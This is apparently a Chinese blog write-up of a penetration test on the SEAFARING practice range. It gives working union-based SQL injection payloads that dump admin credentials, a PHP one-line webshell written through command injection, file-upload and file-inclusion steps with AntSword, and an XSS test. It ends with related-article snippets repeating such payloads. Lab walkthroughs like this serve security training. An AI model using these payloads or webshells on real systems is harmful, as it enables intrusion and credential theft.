首页 > 其他分享 >SEAFARING靶场渗透

SEAFARING靶场渗透

时间:2024-09-13 18:51:56浏览次数:10  
标签:name 渗透 漏洞 SEAFARING --+ table 靶场 id schema

一.SQL注入漏洞

1.输入id=1 --+ 下方出现数据说明闭合成功

2.测试得出数据库有三列

 

3.三处都是回显点

 

4.联合查询爆出库名

 

5.查表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+ 

 

6.查字段名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+ 

 

7. 查出用户名和密码

?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+ 

 

二.文件上传漏洞

1.用我们刚才获取的用户名和密码登录后发现可以上传文件

 

2.上传一句话木马进去

 

3.将文件地址拼接到网址后进行访问

 

4.使用蚁剑连接

 

三.命令执行漏洞

1.网址下方的输入框提示我们可以执行命令

 

2.尝试输入ls有效

 

3.借助这个漏洞我们写一句话木马到888.php 并访问

echo '<?php @eval($_POST[cmd]);?>' > 888.php 

 

4.复制地址用蚁剑连接

 

四.文件包含漏洞

1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含

 

2.访问php文件复制地址蚁剑连连接即可

 

五.XSS漏洞

在登录框中测试有没有XSS漏洞,成功弹窗

 

 

标签:name,渗透,漏洞,SEAFARING,--+,table,靶场,id,schema
From: https://blog.csdn.net/kknifek/article/details/142217431

相关文章

  • SEAFARING靶场漏洞攻略
    寻找漏洞一,我们打开页面第一个漏洞xss漏洞1.在登录页面显示有弹窗第二个漏洞sql注入漏洞1.在输入框的地方输入-1unionselect1,2,3#我们来查看他的回显点2.查看数据库表名-1unionselect1,database(),3#3.查看表名-1unionselect1,2,group_concat(table_......
  • seafaring靶场渗透测试
    1.sql注入漏洞进来这里有个框尝试xss没有那咱们就来试试搜索行注入这里有东西说明闭合成功,接着就orderby有三列三个地方都有回显查看数据库这里查表发现只有两个先去看看admin先来看看列然后看用户密码,这里密码直接显示出来了2.文件上传漏洞拿去登录看看里......
  • sqlgun靶场练习
    1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞2.有xss大概率也存在sql注入,测试到3的时候发现有回显3.进一步得出库名4.要getshell的话我们可以尝试写一句话木马进去,构建payloadkey=-1'unionselect1,"<?php@eval($_POST[cmd]);?>",3intoout......
  • 网络渗透(黑客):从入门到进去
    目录一、网络渗透入门:合法探索的起点二、网络渗透的技能提升:网络安全的守护者三、越界的危险:从网络渗透到非法入侵四、网络安全的重要性:防范非法网络渗透     抓紧时间收藏下载,怕晚了就被下架了!!!(完全免费)     我为大家提供了80个G的自学黑客WEB攻击......
  • 渗透工具包_移动端内网渗透思路_手把手教网安自学路线_安卓渗透思路
    ......
  • sqli-labs靶场自动化利用工具——第8关
    文章目录概要整体架构流程技术细节执行效果小结概要Sqli-Labs靶场对于网安专业的学生或正在学习网安的朋友来说并不陌生,或者说已经很熟悉。那有没有朋友想过自己开发一个测试脚本能实现自动化化测试sqli-labs呢?可能有些人会说不是有sqlmap,那我们又何须使用这个小脚本呢?这里......
  • Rickdiculously Easy靶场渗透测试
    靶机下载地址https://www.vulnhub.com/entry/rickdiculouslyeasy-1,207/一.信息收集1.端口扫描nmap172.16.1.20-p--sV 发现还扫描出一个flag2.目录扫描二.获取shell和提权1、访问靶机IP地址2、拼接并访问robots.txt文件3、逐个访问,发现cgi-bin/tracertool......
  • RickdiculouslyEasy靶场
    1.使用nmap扫描C段,找到具体ip2.使用nmap扫描所有端口3.查看发现13337下找到个第一个flag4.使用xftp连接21端口查看,找到第二个flag.txt,查看,找到flag5.访问9090端口,发现页面显示,找到第三个flag 6.查看60000端口,发现是shell,尝试nc连接60000端口查看目录下文件发现第......
  • PTE-MG诊所靶场 wirteup
    一.信息收集1.端口扫描使用nmap进行扫描,结果如下┌──(kali㉿kali)-[~]└─$nmap-sV10.0.0.91StartingNmap7.94SVN(https://nmap.org)at2024-09-0921:37EDTNmapscanreportfor10.0.0.91Hostisup(0.027slatency).Notshown:993filteredtcpports(n......
  • pikachu靶场的详细搭建,附pikachu靶场源码下载链接
    一、安装好phpstudy首先搭建pikachu靶场的第一步,先是安装好phpstudy,这是一款集成环境的软件,里面包含了Apache,FTP,MySQL,Nginx。phpstudy的官方网址:https://www.xp.cn/download.这里就根据大家的需要,选择Windows版,查看电脑的型号选择对应的PhpStudyV8版本位数,但现在一般电脑配置......